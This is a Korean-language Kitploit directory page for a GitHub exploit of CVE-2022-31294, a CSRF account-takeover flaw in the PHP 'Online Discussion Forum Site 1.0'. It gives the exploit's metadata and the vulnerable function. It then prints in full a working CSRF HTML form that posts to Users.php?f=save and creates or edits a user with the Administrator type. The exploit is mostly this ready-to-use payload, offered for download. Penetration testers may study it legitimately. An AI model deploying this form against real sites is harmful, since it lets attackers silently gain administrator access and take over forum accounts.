Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-31294 — 온라인 토론 포럼 사이트 1.0 - 계정 탈취 | Kitploit
도구/GitHubGitHub/bigzooooz/cve-2022-31294
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthentication
GitHubbigzooooz/cve-2022-31294

CVE-2022-31294

온라인 토론 포럼 사이트 1.0 - 계정 탈취

저장소 보기
1114년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-31294

온라인 토론 포럼 사이트 1.0 - 계정 탈취

익스플로잇 제목: 온라인 토론 포럼 사이트 1.0 - CSRF 새 관리자 사용자 생성/기존 관리자 사용자 수정 [계정 탈취]

날짜: 2022-06-13

CVE: CVE-2022-31294

익스플로잇 작성자: Abdulaziz Saad (@b4zb0z)

공급업체 홈페이지: https://www.sourcecodester.com/

소프트웨어 링크:

https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html

버전: 1.0

테스트 환경: LAMP, Ubuntu


[#] 취약점 위치: function save_users() in /odfs/classes/Users.php:13


[#] 익스플로잇: <form action="http://localhost/odfs/classes/Users.php?f=save" method="post" id="manage-user"> <input type="text" name="id" value="" placeholder="Keep empty if you want to create new user / put user ID to edit existing user"> <div class="form-group"> <label for="name">First Name</label> <input type="text" name="firstname" id="firstname" class="form-control" value="" required> </div> <div class="form-group"> <label for="name">Middle Name</label> <input type="text" name="middlename" id="middlename" class="form-control" value=""> </div> <div class="form-group"> <label for="name">Last Name</label> <input type="text" name="lastname" id="lastname" class="form-control" value="" required> </div> <div class="form-group"> <label for="username">Username</label> <input type="text" name="username" id="username" class="form-control" value="" required autocomplete="off"> </div> <div class="form-group"> <label for="password"> Password</label> <input type="password" name="password" id="password" class="form-control" value="" autocomplete="off"> </div> <div class="form-group"> <label for="type" class="control-label">Type</label> <select name="type" id="type" class="form-control form-control-sm rounded-0" required> <option value="1" >Administrator</option> <option value="2" >Registered User</option> </select> </div> <button type="submit">Save</button> </form>

도구 다운로드